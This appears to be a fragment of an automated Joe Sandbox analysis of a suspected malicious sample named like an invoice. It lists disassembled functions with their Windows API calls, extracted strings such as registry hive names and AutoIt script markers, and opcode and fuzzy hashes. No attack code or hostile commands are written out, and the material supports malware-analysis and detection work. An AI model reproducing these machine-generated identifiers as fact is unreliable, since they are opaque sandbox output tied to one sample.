                                          • GetWindowRect.USER32(00000000), ref: 0048A414
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                          • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                          • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                          • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                          Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00484424
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                          • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                          • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                          • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                          Function 0048B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                                          • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                                          • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                                            • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                          • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                                          • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                          • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                                          Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                          • GetDriveTypeW.KERNEL32 ref: 0046A418
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
                                          • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                          • Opcode Fuzzy Hash: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
                                          • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                          Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                          • GetFocus.USER32 ref: 0048C20C
                                          • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                          • _memset.LIBCMT ref: 0048C342
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                          • GetMenuItemCount.USER32(?), ref: 0048C38D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                          • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                          • Opcode Fuzzy Hash: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                          • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                          Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0047738F
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                          • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                          • SelectObject.GDI32(00000000,?), ref: 004773B4
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                          • SelectObject.GDI32(00000006,?), ref: 00477470
                                          • DeleteObject.GDI32(?), ref: 00477479
                                          • DeleteDC.GDI32(00000006), ref: 00477480
                                          • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                          • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                          • Opcode Fuzzy Hash: 7873df36c3b01a58c6129bf903e3282349e39d1e1405b60028bb58254ce1fe1e
                                          • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                          Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                            • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                            • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: 6af38cb97550c4db32f206dd7676bfc2b9136bbc5815332a324c02996c6e3436
                                          • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                          • Opcode Fuzzy Hash: 6af38cb97550c4db32f206dd7676bfc2b9136bbc5815332a324c02996c6e3436
                                          • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                          Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00462D50
                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                          • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                          • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                          • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                          • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                          • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                          • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                          • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                          • GetCursorPos.USER32(?), ref: 00462F56
                                          • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                          • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 3993528054-0
                                          • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                          • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                          • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                          • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                          Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 004788D7
                                          • CoInitialize.OLE32(00000000), ref: 00478904
                                          • CoUninitialize.OLE32 ref: 0047890E
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                          • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                          • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                          • VariantClear.OLEAUT32(?), ref: 00478C35
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID: ,,I
                                          • API String ID: 2395222682-4163367948
                                          • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                          • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                          • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                          • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                          Function 004577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _memset.LIBCMT ref: 0045786B
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                          • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                                          • Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
                                          • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                                          Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                          • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                          • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                          • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                          Function 0045F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                                          • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • _wprintf.LIBCMT ref: 0045F7FC
                                          • __swprintf.LIBCMT ref: 0045F81E
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                                          • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                                          • Opcode Fuzzy Hash: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                                          • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                                          Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
